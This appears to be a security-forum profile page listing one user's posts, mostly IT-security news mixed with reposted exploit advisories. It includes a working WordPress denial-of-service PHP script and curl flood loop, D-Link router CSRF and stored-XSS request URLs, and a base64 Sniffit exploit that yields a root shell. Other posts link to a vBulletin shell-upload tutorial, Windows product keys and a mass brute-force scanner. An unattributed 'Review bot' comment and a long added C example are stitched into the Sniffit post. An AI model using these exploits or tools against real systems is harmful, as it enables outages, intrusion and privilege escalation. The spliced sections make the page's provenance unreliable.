Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. For chat!

     @Wired there is already a button for that, I'll come back with pictures. The last button: you press it once and it does exactly that, that's about it. Check before you open pointless topics...
  2. @rom3ocrash I understand, it's not a problem. And don't get upset because you're being attacked.
  3. Bitdefender Box keeps viruses away from Internet of Things gadgets.

     Bitdefender has launched, for now only in the US, a unique product meant to provide IT security to devices of any kind connected to the Internet. Bitdefender Box will protect not only computers, phones and tablets, but also smart TVs, smart refrigerators, lighting systems or alarm systems connected to Wi-Fi. It is an antivirus solution that is both software and hardware, which Americans will be able to pre-order from mid-December, with the product reaching users in January. Bitdefender is not yet targeting the Romanian market, because the number of Internet-connected household appliances here is small.

     With this box, which you put in your home and connect to the Internet, you no longer worry about viruses; the Romanians are the first player in the industry to create a complete solution against IT threats for the Internet of Things. The official launch of Bitdefender BOX will take place at the end of January, in the United States of America. The launch plan covers the American market first, followed by a few Western European markets.

     Bitdefender BOX is an ingenious mix of hardware and software, presented in a case with a minimalist design, which offers an innovative level of protection for all the things and people that cross the threshold of a home. The complex network-level protection stops any type of threat even before it reaches the smart devices that surround us at home. At the same time, Bitdefender BOX is also equipped with anti-theft technologies, which prevent the loss or theft of devices, as well as tune-up functions, which optimize and update operating systems to ensure they run as well as possible.

     Source

     I, for one, can't wait for it to launch here too.
  4. @Mandrake1942 it's a config for bruteforce.
  5. I'll be back with new ones.
  6. Oh, welcome. Any projects?
  7. Wordpress < 4.0.1 - Denial of Service

     ====================================================================
     DESCRIPTION:
     ====================================================================
     A vulnerability present in Wordpress < 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

     ====================================================================
     Time Line:
     ====================================================================
     November 20, 2014 - A Wordpress security update and the security advisory are published.

     ====================================================================
     Proof of Concept:
     ====================================================================
     Generate a payload and try with a valid user:

     echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

     Perform a DoS with a valid user:

     for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done

     ====================================================================
     Authors:
     ====================================================================
     -- Javer Nieto -- http://www.behindthefirewalls.com
     -- Andres Rojas -- http://www.devconsole.info

     ====================================================================
     References:
     ====================================================================
     * https://wordpress.org/news/2014/11/wordpress-4-0-1/
     * https://www.drupal.org/SA-CORE-2014-006
     * http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
     * http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
     * http://www.devconsole.info/?p=1050

     WordPress <=4.0 Denial of Service Exploit

     <?php
     // CVE-2014-9034: each login attempt carries a 1 MB password, which the server
     // runs through its (iterated) password hash; many parallel requests exhaust CPU.
     echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
     echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
     echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
     echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";

     if ($argc < 4) {
         exit("error: three arguments are required\n");
     }

     echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];

     while (true) {
         $multi = curl_multi_init();
         $channels = array();

         for ($x = 0; $x < (int)$argv[3]; $x++) {
             $ch = curl_init();
             // Login form fields as submitted by wp-login.php; 'pwd' is the oversized password.
             $postData = array(
                 'log'         => $argv[2],
                 'pwd'         => str_repeat("A", 1000000),
                 'redirect_to' => $argv[1] . "/wp-admin/",
                 'reauth'      => 1,
                 'testcookie'  => '1',
                 'wp-submit'   => "Log In");   // curl URL-encodes the array itself
             $cookieFiles = "cookie.txt";
             curl_setopt_array($ch, array(
                 CURLOPT_HEADER         => 1,
                 CURLOPT_USERAGENT      => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
                 CURLOPT_REFERER        => $argv[1] . "/wp-admin/",
                 CURLOPT_COOKIEJAR      => $cookieFiles,
                 CURLOPT_COOKIESESSION  => true,
                 CURLOPT_URL            => $argv[1] . '/wp-login.php',
                 CURLOPT_RETURNTRANSFER => true,
                 CURLOPT_POST           => true,
                 CURLOPT_POSTFIELDS     => $postData,
                 CURLOPT_FOLLOWLOCATION => true));
             curl_multi_add_handle($multi, $ch);
             $channels[$x] = $ch;
         }

         // Drive all handles in parallel until every request has completed.
         $active = null;
         do {
             $mrc = curl_multi_exec($multi, $active);
         } while ($mrc == CURLM_CALL_MULTI_PERFORM);
         while ($active && $mrc == CURLM_OK) {
             do {
                 $mrc = curl_multi_exec($multi, $active);
             } while ($mrc == CURLM_CALL_MULTI_PERFORM);
         }

         foreach ($channels as $channel) {
             curl_multi_remove_handle($multi, $channel);
         }
         curl_multi_close($multi);
         echo ".";
     }
     ?>
  8. Microsoft is doing a fine job of burying Windows XP, but still has a long way to go toward getting people onto the latest version of its operating system.

     According to Statcounter, usage of Windows 8.1 narrowly overtook Windows XP in November. That's partly due to record growth for Windows 8.1, which went from 9.31 percent in October to 10.95 percent last month. Windows XP usage also continued to plummet in its seventh full month without Microsoft support, dropping from 11.95 percent to 10.69 percent.

     Windows 8.1 is likely benefiting from the back-to-school season, as most new PCs are shipping with the operating system on board. Some Windows 8 users may still be getting around to the free upgrade as well, as Windows 8 usage dropped from 5.94 percent to 4.9 percent in November.

     But none of this activity appears to be harming Windows 7, whose usage increased for the second straight month. The five-year-old operating system now accounts for 50.34 percent of desktop usage, so it's the most popular desktop OS by far.

     Another metrics firm, Netmarketshare, also recorded share increases for both Windows 7 and Windows 8.1 last month, but still shows Windows XP ahead of the latest version by a narrow margin, despite plummeting usage for the ancient OS. It seems likely that Windows 8.1 will land on top for both metrics firms within a month or two.

     The story behind the story: On some level, Microsoft is happy as long as it's selling licenses. (In its push to kill XP, the company has encouraged users to consider either Windows 7 or Windows 8.) But of course, Microsoft would prefer to get users onto the latest version, which is tied more deeply into services like OneDrive and Bing. Expect a major upgrade offensive against Windows 7 next year, with rumors of free or cheap consumer upgrades to the more desktop-friendly Windows 10.

     Source
  9. @narciszu I expressed myself badly, they are Product Keys.
  10. @logged yes, thanks, I just noticed that not all of them are for Steam. Sorry, I edited the title.
  11. If you believe that protecting against cyberattacks from government agencies requires the same processes as defending against any other threat -- well, to some extent, you are right. Government agencies will happily use easy "script kiddie" tools and well-known exploits to get into your systems to avoid tipping their hand about who they are and what they're really after. And they have the money to buy and use the most advanced tools used by criminal organizations to get into your payments data. So protecting against these kinds of common attacks is necessary if you are trying to protect yourself against state-sponsored attackers -- but it is not sufficient. There are some key differences about attacks that originate with foreign governments, and ignoring these differences could prove deadly.

      1. They're going after different types of data

      Vandals are out to make a loud splash, so they'll go after public-facing websites, or just randomly disrupt whatever's within reach. Criminals will go after stuff they can sell. Foreign nations will hit embassies and government agencies for political information, said Jaime Blasco, director of labs at San Mateo, CA-based AlienVault, Inc. And they'll go after private companies, as well -- and not just defense contractors, either. "If specific companies have developed a technology or method to do something, they might steal information to gain that information for competitive advantage for Chinese companies," he said. And they'll also go after personal information or business information that would provide them with the insights they need to break into more companies. Blasco was part of the team that took down UglyGorilla, a Chinese hacker who broke into computers at five U.S. companies including Westinghouse Electric Co. and United States Steel Corp earlier this year and stole trade secrets and other information.

      Blasco also uncovered Sykipot, a China-based attack which was able to bypass two-factor authentication and steal trade secrets from the automotive and aerospace industries. "What we thought was a primary reason for gain might not be as obvious anymore," said Carl Wright, general manager at San Mateo, CA-based TrapX, which recently uncovered a Chinese attack against international shipping and logistics companies. For example, an attack against certain types of agricultural equipment might produce valuable insights about grain production, he said.

      2. They might not be after data at all

      Foreign governments are after power, and not just in the "information is power" kind of way. They'll go after another country's actual power grid, fuel pipelines, or nuclear reactors. "They would be also happy causing disruption in government services, taking out communication systems, disrupting a nation's economy, or causing reputation damage of state-related institutions," said Jeff Williams, CTO at Palo Alto, CA-based Contrast Security. Of course, we play this game as well. It's pretty well accepted that the U.S. was behind the Stuxnet attacks that took out the nuclear reactors in Iran and delayed their ability to produce weapons significantly, said Williams.

      3. They're operating on a longer timescale

      Criminals and vandals are after quick payoffs. "When you steal someone's credit card, the time period that that's a valuable asset is very short," said Carl Wright, general manager at San Mateo, CA-based security firm TrapX. "At some point, the credit card company cancels that credit card and the consumer is issued a new card." A foreign government, by comparison, could have unlimited patience. "They might get in and sit there for a while and not try to do a whole lot until they feel the time is right," said Ben Johnson, chief security strategist at Waltham, Massachusetts-based Bit9, Inc.

      In fact, he said, they might actually patch vulnerabilities they find in order to keep anyone else from getting in and setting off alerts. "If they think they tripped up a defense, they might lay low for a little bit," he said. "Or, on the flip side of that, if they think they're about to be kicked out because the company is killing off the user accounts, they might grab data as fast as possible."

      4. They might never be discovered

      According to this year's Verizon breach report, 84 percent of the reported attack discoveries were made by third parties. This is particularly the case with credit card data, said D.J. Vogel, a partner in the security and compliance practice at Naperville, Ill.-based professional services firm Sikich LLP. When payment data is stolen, there are numerous third parties involved that might sound the alert, he explained: the individual consumer, for example, who finds unusual charges on her bill; the payment processors and credit card companies who monitor transactions for unusual patterns; law enforcement agencies eavesdropping on illegal credit card number auctions. But when it comes to the theft of trade secrets, it could be years before the victim finds out -- if they find out at all, he said. "The industry as a whole is less likely to identify state-sponsored attacks," he said. "It's much easier to fly under the radar, and not be undetected." And even if a company discovers that it's been attacked and data was stolen, that's still not the whole story. "The million-dollar question becomes what the heck they're doing with it?" asked Dodi Glenn, senior director of security intelligence and research labs at Clearwater, FL-based ThreatTrack Security, Inc. "Are they trying to design another Apple iPhone and sell it cheaper? Or are they trying to tap into an iPhone with some vulnerability that they'll never disclose? They don't make it known what they do with the data. We can only infer what they're targeting."

      5. They're not afraid to get physical

      Despite what you see on television, a criminal isn't likely to follow a company executive around in order to physically infect their laptop or cellphone with malware. The costs -- time, travel expenses, possibility of getting caught -- are too high. It's much easier to go after some other executive who has a phone that can be hacked without physical contact. In the case of state-sponsored attacks, however, especially within that state's own borders, the costs and risks are minimal. In fact, they might actually set up a meeting with the targeted executive, said Michael Shaulov, CEO at San Francisco-based Lacoon Mobile Security, Inc. Then all they need is a little private time with the laptop or cell phone in order to infect it. There are even several ways to infect iPhones, Shaulov added. And, of course, a foreign nation-state often has full access to its own telephone networks.

      6. The airwaves aren't safe

      The airwaves aren't safe either, Shaulov added. "In Russia, they discovered a couple of fake mobile cell towers," he said. "Every time someone would pass through that coverage area, someone in the government would intercept their communications." The same approach works on foreign territory as well, he added. A mini cellphone tower can be hidden in a suitcase and carried to a location close to the target, or placed in a vehicle in order to have a larger coverage area. "If you look out the window and see a white van, be suspicious," he said.

      7. They stay on target

      A financially-motivated criminal wants to see the biggest return on their investment, so they'll go after the least-defended companies first. "There are certainly plenty of targets," said Steve Hultquist, chief evangelist at Sunnyvale, Cal.-based RedSeal, Inc. "I can just go on to the next one." A company doesn't have to have perfect security to defend itself -- all it has to do is avoid being the lowest-hanging fruit. A state-sponsored attacker, however, is motivated by strategic gain, not financial. They'll keep after a company, its employees, and its business partners, until they get in.

      8. They have a large, well-organized team

      Criminals are most likely to work alone, or in loosely-affiliated teams. A state-sponsored attacker, however, might be working out of an actual office, under a well-trained project manager. "State-sponsored cyberattacks are much more likely to be organized and run by a large group of people," said Jeff Williams, CTO at Palo Alto-based Contrast Security. "They're going to have a full lab full of people trained and executing a whole bunch of attacks against a whole bunch of things at once." And they'll work around the clock, added Udi Mokady, CEO at Israel-based CyberArk Software, Ltd. "It's based on people working shifts with well-managed processes and development," he said. "They behave like a development arm and are able to carry out sophisticated attacks." And speaking of development...

      9. They'll create new zero-day exploits

      A foreign government can afford to create a brand new, unique zero-day attack to go after individual targets. "They are deeply talented and likely spend substantial resources to identify zero day vulnerabilities," said John Dickson, principal at San Antonio, TX-based Denim Group, Ltd. "They have shown willingness to have a lot of people spend a ton of time trying to get into certain places." And the foreign government would then keep those vulnerabilities secret, to use them again, or to ensure that its attack wouldn't be discovered. A criminal is also interested in getting the maximum use possible out of an exploit, but within a much shorter time frame. An exploit that's sitting around not being used isn't making them any money and, given how slowly some companies patch, even a discovered exploit can remain profitable for years to come.

      10. They set the bar for other types of attacks

      "The reality is that US companies and government agencies are only barely prepared for the very lowest level of threat -- the auditor," said Contrast Security's Williams. And auditors are always several years behind the curve, because they use regulations and standards drafted years before. That means that most organizations are unprepared for techniques commonly used today by all types of hackers, such as automated tools. "We should be building systems designed to resist the attacks that we expect ten years from now, not the attacks occurring two years ago," he said. That means that all organizations should be getting ready to face long-term, well-coordinated, almost invisible attacks. "In ten years, this type of attack will be available to even unskilled attackers, and we should be preparing our critical infrastructure to withstand it," he said.

      Source
  12. Hello list!

      There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

      -------------------------
      Affected products:
      -------------------------
      The following model is vulnerable: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions must also be vulnerable. D-Link will fix these vulnerabilities in the next firmware version (to be released in November), as they answered me in October. But in November they answered me that the firmware still had not been publicly released due to bugs and that they needed to work on it.

      I tested model DAP-1360/B/D1B. There are three models of DAP-1360:
      DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's an EOL device.
      DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities in new firmware, which will be released in November.
      DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes fixes for the vulnerabilities.

      ----------
      Details:
      ----------
      In section Wi-Fi - MAC filter - Filter mode it's possible to change the parameter MAC filter restrict mode:

      Disabled:
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

      Allow:
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

      Deny:
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

      In section Wi-Fi - MAC filter - MAC addresses it's possible to add and remove MAC addresses:

      Add:
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

      Remove:
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

      XSS (persistent XSS) (WASC-08):
      http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

      The code will execute at http://192.168.0.50/index.cgi#wifi/mac.

      ------------
      Timeline:
      ------------
      2014.05.22 - informed developer about multiple vulnerabilities.
      2014.06.21 - announced at my site about new vulnerabilities in DAP-1360.
      2014.11.26 - disclosed at my site (http://websecurity.com.ua/7215/).

      Best wishes & regards,
      MustLive
      Administrator of Websecurity web site
      http://websecurity.com.ua

      Source
  13. CVE-2014-5439 - Root shell on Sniffit

      Authors: Ismael Ripoll & Hector Marco
      CVE: CVE-2014-5439
      Dates: July 2014 - Discovered the vulnerability

      Description

      Sniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string(), which causes a stack buffer overflow when parsing a configuration file with "long" paths (more than 20 characters). The attacker can create a specially-crafted sniffit configuration file which is able to bypass all three protection mechanisms:

      - Non-eXecutable bit (NX)
      - Stack Smashing Protector (SSP)
      - Address Space Layout Randomisation (ASLR)

      and execute arbitrary code with root privileges (the id of the user that launches sniffit). The new issue has been assigned CVE-2014-7169. The presented PoC successfully exploits the vulnerability.

      Impact

      To use sniffit, the application needs to be executed with root privileges, typically via sudo or pkexec or by setting the SUID bit. Since this tool requires this privilege to run the sniffer, merely allowing a user to execute the sniffer is enough to execute commands as root.

      Vulnerable packages

      Sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository, installable via apt-get install sniffit. For example, sniffit is available on Ubuntu 14.04.1 LTS and prior.

      Vulnerability

      The vulnerability is caused by the incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. The bug appears in file sn_cfgfile.c in the following functions:

      char *clean_string (char *string)
      {
        char help[20];
        int i, j;

        j=0;
        for (i=0;i<strlen(string);i++)
          {
            if( (isalnum(string[i]))||(string[i]=='.') )
              {
                help[j]=string[i];
                help[j+1]=0;
              }
            j++;
          }
        strcpy(string, help);
        return string;
      }

      char *clean_filename (char *string)
      {
        char help[20];
        int i, j;

        j=0;
        for (i=0;i<strlen(string);i++)
          {
            if( !(iscntrl(string[i])) && !(isspace(string[i])) )
              {
                help[j]=string[i];
                help[j+1]=0;
              }
            j++;
          }
        strcpy(string, help);
        return string;
      }

      Exploit (PoC)

      I have built an exploit to bypass the three most popular protection techniques: Non-eXecutable bit (NX), Stack Smashing Protector (SSP) and Address Space Layout Randomisation (ASLR). The exploit finally obtains a root shell. The exploit was successfully tested on Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64), fully updated.

      The sniffit exploit is a shell script which creates a specially-crafted configuration file "exploit-sniffit-0.3.7-shell.cfg". Passing this configuration file to sniffit through the "-c" option, we obtain a root shell.

      ---- start exploit-sniffit-0.3.7-shell.sh exploit ----
      cfgfile='
      bG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG
      QUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ
      P0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y
      IE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK'

      echo ""
      echo "-----------------------=======-------------------------"
      echo "----------------=======================----------------"
      echo ""
      echo "  Author:  Hector Marco-Gisbert <hmarco@hmarco.org>"
      echo "  Website: http://hmarco.org"
      echo "  Comment: Exploit for sniffit <= 0.3.7 (root shell)"
      echo ""
      echo "----------------=======================----------------"
      echo "-----------------------=======-------------------------"
      echo ""
      echo "[+] Creating crafted configuration file for sniffit ..."
      echo "${cfgfile}" | base64 -d > exploit-sniffit-0.3.7-shell.cfg
      echo -e "\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !"
      echo ""
      echo "[+] Help:"
      echo "    If your sniffit is installed with the Set-User-ID then execute:"
      echo "    $ sniffit -c exploit-sniffit-0.3.7-shell.cfg"
      echo ""
      echo "    If you are allowed to execute sniffit with sudo then execute:"
      echo "    $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg"
      echo ""
      ---- end exploit-sniffit-0.3.7-shell.sh exploit ----

      Obtaining a root shell:

      box@upv.es:~$ id
      uid=1000(box) gid=1000(box) groups=1000(box)
      box@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg
      #
      # id
      uid=1000(box) gid=1000(box) euid=0(root) groups=1000(box)

      FIX

      The following is a simple patch which fixes the bug.

      Patch for sniffit 0.3.7:

      diff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c
      --- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200
      +++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200
      @@ -119,6 +119,11 @@ char *clean_string (char *string)
       char help[20];
       int i, j;
      +if(strlen(string) >= 20){
      + fprintf(stderr, "Error: String too long [%s]\n", string);
      + exit(-1);
      +}
      +
       j=0;
       for(i=0;i<strlen(string);i++) {
      @@ -138,6 +143,11 @@ char *clean_filename (char *string)
       char help[20];
       int i, j;
      +if(strlen(string) >= 20){
      + fprintf(stderr, "Error: String too long [%s]\n", string);
      + exit(-1);
      +}
      +
       j=0;
       for(i=0;i<strlen(string);i++) {

      [ sniffit-0.3.7-stack-buffer-overflow.patch ]

      Patching sniffit 0.3.7:

      wget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch
      cd sniffit-0.3.7
      patch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch

      Discussion

      It is hard to understand why sniffit is still in the Ubuntu universe repository, where it is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow bypassing the Stack Smashing Protector (SSP) very easily and building a sequence of ROP gadgets which finally obtains a root shell. On the other hand, it seems that the code of sniffit is no longer maintained, and it may contain additional security issues. Therefore, it is strongly recommended not to use sniffit at all, for the sake of your security.

      Hector Marco - http://hmarco.org

      Source
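Review bot: both hunks add `if(strlen(string) >= 20)` before the copy loop, which does keep `help[20]` from overflowing, but they leave the loop itself as it was: `j++` sits outside the `if`, so when a character is dropped the terminator written by the previous kept character stays at `help[j]` and `strcpy(string, help)` truncates the result at the first removed character (and if the very first character is dropped, `help[0]` is never written and `strcpy` reads an uninitialised byte). Compacting `string` in place with a separate write index, `if (keep) string[j++] = string[i]; ... string[j] = 0;`, would remove both `help[]` and the 20-byte limit. Also, `exit(-1)` inside a string helper aborts the whole sniffer on one long config line and echoes attacker-controlled text to stderr via `[%s]`; returning an error for the config parser to report would be cleaner.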
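The sanitiser logic quoted from sn_cfgfile.c above, reproduced beside a corrected version, as an added example that is not code from the advisory or from the sniffit project. `clean_string_vuln` keeps the original behaviour (20-byte stack buffer, `j` advancing past dropped characters), so it must only be called on inputs shorter than 20 bytes; `clean_string_bounded` mirrors the published patch's length guard but returns an error instead of calling `exit()`; `clean_string_fixed` and `clean_filename_fixed` filter in place with a separate write index, which needs no temporary buffer and also repairs a second defect visible in the original loop: because `j++` runs even for dropped characters, the result is truncated at the first removed character rather than having it stripped. All four function names are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Original sniffit 0.3.7 logic. Only safe for strlen(string) < 20: a longer
 * input writes past help[] and smashes the stack, which is the advisory's bug. */
char *clean_string_vuln(char *string)
{
    char help[20];
    int i, j;

    j = 0;
    for (i = 0; i < (int)strlen(string); i++) {
        if (isalnum((unsigned char)string[i]) || string[i] == '.') {
            help[j] = string[i];
            help[j + 1] = 0;
        }
        j++;   /* advances past dropped characters too, leaving the old NUL behind */
    }
    strcpy(string, help);
    return string;
}

/* Length guard in the style of the published patch, but reporting failure to
 * the caller (the config parser) instead of exit()ing the sniffer. */
int clean_string_bounded(char *string)
{
    if (strlen(string) >= 20)
        return -1;
    clean_string_vuln(string);
    return 0;
}

/* In-place filter: read index i, write index j, no temporary buffer, so there
 * is no length limit and a dropped character is really removed. */
char *clean_string_fixed(char *string)
{
    size_t i, j = 0;

    for (i = 0; string[i] != '\0'; i++) {
        unsigned char c = (unsigned char)string[i];
        if (isalnum(c) || c == '.')
            string[j++] = string[i];
    }
    string[j] = '\0';
    return string;
}

/* Same shape for the filename variant: drop control and whitespace characters. */
char *clean_filename_fixed(char *string)
{
    size_t i, j = 0;

    for (i = 0; string[i] != '\0'; i++) {
        unsigned char c = (unsigned char)string[i];
        if (!iscntrl(c) && !isspace(c))
            string[j++] = string[i];
    }
    string[j] = '\0';
    return string;
}

int main(void)
{
    /* Constructed sample inputs; the long one is 30 bytes, over the 20-byte buffer. */
    char a[64] = "a b";
    char b[64] = "a b";
    char c[64] = "../../../../../../../../bin/sh";

    printf("vuln:    \"%s\"\n", clean_string_vuln(a));    /* "a": truncated at the space */
    printf("fixed:   \"%s\"\n", clean_string_fixed(b));   /* "ab" */
    printf("bounded: %d (input is %zu bytes)\n", clean_string_bounded(c), strlen(c)); /* -1 */
    printf("fixed:   \"%s\"\n", clean_string_fixed(c));   /* slashes removed, no overflow */
    return 0;
}
```

The in-place version is what the patch's guard approximates: once the copy never leaves the caller's buffer, the 20-byte limit and the `exit()` path both disappear.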
  14. An international operation led by Europol has seized the domain names of 292 websites that were selling counterfeit or pirated products.

      The seizures are part of Europol's In Our Sites project and involved 25 law enforcement agencies from 19 countries, including the UK, Spain, France and Denmark, with the assistance of the US Department of Homeland Security's Immigration and Customs Enforcement. Europol said that the action followed leads received in August from trademark holders about the infringing websites. The seized domain names now remain in the possession of the governments involved in the operations.

      The most popular domains proved to be websites selling counterfeit luxury goods, sportswear, electronics and pharmaceuticals, along with pirated music and films. People trying to access the seized domains will encounter a notice explaining why the websites are unavailable and the criminality behind copyright infringement.

      "The infringement of international property rights is a growing problem in our economies and for millions of producers and consumers," said Europol director Rob Wainwright. "Europol is committed to working with its international partners to crack down on the criminal networks responsible for this illegal activity."

      The In Our Sites project has resulted in the seizure of 1,829 domain names since its inception in November 2012. Interpol said that counterfeit goods put personal financial information at risk of fraud, and often fund more serious criminal operations. "The crimes can cause revenue and tax losses, unemployment, environmental, health and safety issues for humans and animals, human exploitation and child labour," said Europol. The law enforcement agency emphasised that consumers should report the counterfeit products and the websites selling them, explaining that "counterfeiting crimes result in many victims".

      V3 contacted Europol to find out how it prevents the websites appearing in the first place, rather than taking them down after they emerge, but the agency has yet to respond. Europol appears to be scaling up its operations to tackle cyber crime. The organisation recently joined forces with the European Banking Federation to share information on cyber threats.

      Source
  15. E-cigarettes have been fingered as the source of a new computer virus. "IT guy" Jrockilla told the Talesfromtechsupport forum that he suspects the malware was "hard coded" into the USB charger of his boss's electronic toker.

      In his post, he says:

      He added:

      During the subsequent debate on Reddit, users called for further evidence that the charger was indeed the source, and that hasn't been forthcoming, but it does point to the danger corporates face with users plugging unauthorised devices into USB ports for charging. One user suggests that while a memory device will announce itself when plugged in, a keyboard will not, so a malevolent USB device could masquerade as a keyboard and then accept the security prompts which flashed up as the device asked for permissions. A savvy user would spot this if they were watching, but not if they were busy fiddling with an e-cig (essentially a battery-powered vaporizer which has the feel of tobacco, but produces only an aerosol) at the same time.

      Naturally, the non-smoking sticks could be charged with a wall charger, but IT professionals need to be aware that the threat exists. Again, the thread warns that it might be significant, pointing to research by the German researchers SRLabs showing that USB devices can be made unstoppable. It has also been suggested that a device be used to limit the USB port, but that is of course moving the trust around. If you really want to investigate what a port is doing, there are devices such as Facedancer which will investigate just that sort of thing. In the meantime, it might just be easier to quit altogether.

      Source
  16. KASPERSKY HAS USED ITS annual gaze into the crystal ball of cybercrime to predict attacks on digital wallet and virtual payment schemes, citing Apple Pay as a potential target.

      The malware-mashing security company has suggested that ATMs and payment systems will be likely targets for hackers in the coming 12 months, naming the recently launched Cupertino Bucks service as a probable victim. Apple Pay launched in the US in October and has had its fair share of headlines, not least after Tim Cook announced that the addition of NFC was one of the "biggest advances in iPhone history", coming a mere eight years after the Nokia 6131 became the first NFC-equipped handset. A launch of the service in Europe is earmarked for 2015, and it is likely to see a whole new audience of hackers as the profitability and turnover of the service grows.

      The Kaspersky Security Bulletin 2014. Predictions 2015 report explains: "Previous attacks have focused on NFC payment systems but, thanks to limited adoption, these have reaped limited rewards. Apple Pay is bound to change that. The enthusiasm over this new payment platform is going to drive adoption through the roof and that will inevitably attract many cyber criminals looking to reap the rewards of these transactions."

      Despite praising the security of Apple Pay, Kaspersky warns that it is not a time for complacency. "Apple's design possesses an increased focus on security (like virtualised transaction data) but we'll be very curious to see how hackers will exploit the features of this implementation," the report said.

      Other trends in the what's hot and what's not of digital debauchery include more 'bleeds' on the internet in the wake of Heartbleed, the distribution of malware for OS X on torrent sites, more targeted cyber attacks on banks and more ATM hijacks. Kaspersky also believes that the more "in your face" gangs are being replaced by smaller groups launching attacks separately, leaving people with niggly little attacks rather than an overarching threat from a gang of super-villains. The report also suggests that we can expect to see "displays of weakness" in the Internet of Things, and the first signs of adware or spyware in smart TV programming.

      Source
  17. A few Product Keys for Windows (XP, 7, 8 and Server 2008) https://mega.co.nz/#!RdQCgLAQ!oWsz5Y-S7E3BZOrd3c4cvKhc0UpWvDLW1Tub7nWk0x0 pass: https://rstforums.com (the password is the part after //)
  18. As the title says, this is an archive containing 2 videos; the first: vBulletin Remote Code Execution, and the second: vBulletin Remote Code Execution Upload Shell Tutorial. Link: https://mega.co.nz/#!EZJlzQ7T!wCcAbWRiITpgJIwCgm2PUgf8anKua5XJu-rLw1TeR0c Pass: https://rstforums.com (the password is the part after //)
  19. Aerosol

    Ebook List

    I have put together a list of 30 ebooks https://mega.co.nz/#!0EJR2YAa!WRjIEWBHcgI27OklisXWP8SAyOjFygv2Jrexs7z15Ho pass: https://rstforums.com (the password is the part after //)
  20. Arpwatch and arpsnmp are both network monitoring tools. Both utilities monitor Ethernet or FDDI network traffic and build databases of Ethernet/IP address pairs, and can report certain changes via email. Download
  21. Basically, FSU is a bunch of tools written in PHP-CLI. Using built-in functions, you are able to grab URLs using search engines, and so dork for interesting files and full path disclosures. Using a list of URLs, the scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass brute-force attacks for a specific range of hosts, or brute-force SSH with a specific username taken from the FPD. Whenever something interesting is found, like a vulnerability or broken auth credentials, the data will be saved in .txt files, just like the URLs and any other files. FSU is based on PHP and text files; it's still under construction, so I am aware of potential bugs. The principle of operation is simple. Download - https://github.com/Smaash/fuckshitup
  22. XSS (Cross Site Scripting)

